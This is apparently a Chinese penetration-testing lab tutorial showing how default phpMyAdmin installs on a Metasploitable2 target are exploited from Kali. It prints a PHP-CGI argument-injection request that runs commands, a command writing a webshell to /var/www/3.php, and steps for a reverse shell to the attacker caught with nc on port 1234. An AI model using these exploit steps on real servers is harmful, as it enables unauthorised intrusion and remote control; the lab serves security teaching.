Kali Linux渗透测试——默认安装引发的漏洞

默认安装引发的漏洞

即自动扫描后,如何对发现的漏洞告警进行进一步的验证。

实验环境

攻击机:Kali      IP地址:192.168.37.138

靶机:Metasploitable2        IP地址:192.168.37.135

默认安装

1. Windows默认安装漏洞

流传linux操作系统比windows系统安全,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。我们可以通过配置不当等来获取系统的权限。

2. 漏洞类型--远程命令执行

2.1> phpMyadmin/setup

phpMyadmin是安装在web服务器中的web接口,通过使用PHP脚本语言来管理MySQL数据库。

对于早期的版本,安装后若是没有做安全配置,对敏感路径进行删除,就有可能留下安全隐患,其中最明显的就是phpmyadmin/setup

a. 通过手动爬网或扫描工具发现phpmyadmin目录是否可以访问

Kali Linux渗透测试——默认安装引发的漏洞_第1张图片

b.尝试/phpMyAdmin/setup目录是否可以访问【可以不需要身份认证的情况下,对服务器进行配置】

安全配置:phpMyAdmin/setup是不允许从公网访问的。

Kali Linux渗透测试——默认安装引发的漏洞_第2张图片

2.2> 早期的phpmyadmin版本

早期的phpmyadmin有漏洞【可通过在URL地址中编辑或者定制发送的指令,使服务器执行一个PHP页面】

例如:

POST http://192.168.37.135/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1                     #修改服务器中的php.ini文件,使其执行下面的PHP代码
Host: 192.168.37.135                   #存在即可,不一定是靶机IP,123也可以
passthru('id');
die();                                             #后面的指令不执行,可屏蔽服务器返回的html代码等其他不需要的信息
?>

实验过程(Burpsuite)

a. 执行PHP代码,获得www-data用户权限,可进行ls、cat等操作

Kali Linux渗透测试——默认安装引发的漏洞_第3张图片

b. 查看系统中的内容

Kali Linux渗透测试——默认安装引发的漏洞_第4张图片

c. 尝试写入网页木马,进而控制服务器

静态木马webshell,可以通过浏览器去访问

例如:echo "" > /var/www/3.php     #“\”是防止在上传过程中,变量被过滤

Kali Linux渗透测试——默认安装引发的漏洞_第5张图片

在浏览器中执行写好的3.php,失败。

Kali Linux渗透测试——默认安装引发的漏洞_第6张图片

无法直接访问3.php目录,需加问号和参数再执行

Kali Linux渗透测试——默认安装引发的漏洞_第7张图片

反弹shell

a. 通过反弹shell,使服务器将shell反弹给攻击机,在kali中有许多的反弹shell利用代码

Kali Linux渗透测试——默认安装引发的漏洞_第8张图片

b. 修改3.php中的监听主机IP

Kali Linux渗透测试——默认安装引发的漏洞_第9张图片

c. 使用nc侦听反弹端口1234

d. 将shell代码复制粘贴进POST,go发送【此方法相对隐蔽,不易发现】

Kali Linux渗透测试——默认安装引发的漏洞_第10张图片

Kali Linux渗透测试——默认安装引发的漏洞_第11张图片

 

你可能感兴趣的:(kali,Linux,渗透测试)